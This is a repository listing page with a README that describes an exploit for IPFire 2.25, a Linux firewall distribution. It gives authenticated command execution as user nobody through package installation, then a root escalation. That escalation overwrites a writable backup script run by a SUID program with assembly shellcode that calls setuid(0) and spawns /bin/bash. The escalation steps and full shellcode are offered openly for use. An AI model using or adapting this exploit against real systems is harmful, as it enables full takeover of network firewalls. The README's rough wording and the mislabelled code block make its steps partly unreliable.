https://github.com/kaanaryoverflow/ipfire-2-25-auth-rce
ipfire 2.25 authenticated remote code execution
https://github.com/kaanaryoverflow/ipfire-2-25-auth-rce
exploit ipfire rce
Last synced: 4 months ago
JSON representation
ipfire 2.25 authenticated remote code execution
- Host: GitHub
- URL: https://github.com/kaanaryoverflow/ipfire-2-25-auth-rce
- Owner: KaanaryOverFlow
- Created: 2021-05-14T21:15:53.000Z (about 4 years ago)
- Default Branch: main
- Last Pushed: 2021-06-15T12:59:39.000Z (about 4 years ago)
- Last Synced: 2025-02-05T18:06:04.263Z (5 months ago)
- Topics: exploit, ipfire, rce
- Language: Ruby
- Homepage:
- Size: 59.6 KB
- Stars: 2
- Watchers: 3
- Forks: 0
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
# Ipfire 2-25 (core update 156) authenticated rce
- system run command when install any packet
- system getting 7zip from just html
- and check the tmp directory
- version 2.25 - core update 156
- ipfire allows run arbitrary os command as nobody after login
# Be root!
- check the suid binaries
- backup program run another script. /var/ipfire/backup/bin/backup.pl (it is a bash script and permission is looky good)
- try the write in to bash script. (No error. GOOD!)
- try run bash
- yes. we can run but it is low-privegled. we must trig to setuid(0)!
- save this and run ```alti name.asm q```
- alti is my own compile-check program in soo_deep repo.
```py
bits 64
section .data
string db "/bin/bash",0x00
olmadis db "basarisiz.",0x0a,0x00
olmadil equ $-olmadis
section .text
global main
main:
mov rax,105
mov rdi,0
syscall
cmp rax,0
je getbash
mov rax,1
mov rdi,1
mov rsi,olmadis
mov rdx,olmadil
syscall
mov rax,60
xor rdi,rdi
syscall
getbash:
mov rax,59
mov rdi,string
mov rsi,0
mov rdx,0
syscall
```
- and write the new program to /var/ipfire/backup/bin/backup.pl. (we can python http server and curl to write)
- and enjoy the root shell!
